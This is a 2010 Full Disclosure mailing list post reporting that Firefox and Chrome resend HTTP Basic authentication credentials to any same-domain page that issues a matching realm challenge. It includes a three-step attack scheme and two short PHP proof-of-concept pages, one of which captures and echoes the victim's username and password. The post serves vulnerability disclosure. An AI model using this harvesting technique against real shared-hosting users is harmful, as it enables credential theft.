Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

False Authentication Attack/Any Browser

From: iforone <iforone () spof pl>
Date: Sun, 19 Sep 2010 13:03:16 +0200
Hello,
I sent this email to bugzilla@chrome/firefox.

Firefox status: New (since 2010-07-19 22:10)
Chrome status: WontFix

From bugzilla@chrome: 
"something similar assigned to Darin 9 yrs ago -
https://bugzilla.mozilla.org/show_bug.cgi?id=110705 :)"

Decide yourself if this is bug or feature. ;)

Orig mail:

Date: Mon, 19 Jul 2010 13:29:29 +0200
From: iforone <iforone () spof pl>
To: <security () mozilla org>
Subject: Security Bug Bounty: False Authentication Attack

Hello,
I have found propably a bug in the Mozilla Firefox - after proper authentication (basic/digest http auth), the web 
browser sends a 'Authorization' header to every site which sends us 'WWW-Authenticate' header on a given domain. Only 
thing that we should know is a realm, which is not a secret.

The bug can be used, when many people have an access to place where the scripts are in one domain (for example 
mod_usedir in Apache web server).

Chrome ignores 'depth of link', sends 'Authorization' even when the 'bad' htaccess is located above the 'good' (see 
PoC) 
[ RFC 2617 ]

2 Basic Authentication Scheme

[...]

A client SHOULD assume that all paths at or deeper than the depth of
the last symbolic element in the path field of the Request-URI also
are within the protection space specified by the Basic realm value of
the current challenge. A client MAY preemptively send the
corresponding Authorization header with requests for resources in
that space without receipt of another challenge from the server.

[...]


The scheme of an attack:
1. The victim autenticates on the site, where we want to steal the credentials
2. Deliver to victim a link to the our site in the attacked domain
3. Steal the header 'Authorization'

PoC:
http://iforone.spof.pl/a/a/
http://iforone.spof.pl/b/

003307:spof.pl% cat public_html/a/a/index.php 
<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
    header('WWW-Authenticate: Basic realm="Realm"');
    header('HTTP/1.0 401 Unauthorized');
} else 
    echo "Hello ".$_SERVER['PHP_AUTH_USER']."/".$_SERVER['PHP_AUTH_PW'];
?>
003313:spof.pl% cat public_html/b/index.php
<?php
if (!isset($_SERVER['PHP_AUTH_USER']))
    header('WWW-Authenticate: Basic Realm="Realm"');
else
    echo $_SERVER['PHP_AUTH_USER']."/".$_SERVER['PHP_AUTH_PW'];
?>


The solution of this problem is to check whole URI, not only domain.

If You think it's not a bug, but 'feature' it will be nice if you send a confirmation that someone has read this ;)

Best Regards,
zynzel

-- 
PGP PUB KEY: http://iforone.spof.pl/iforone.key

Attachment: signature.asc
Description: This is a digitally signed message part

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: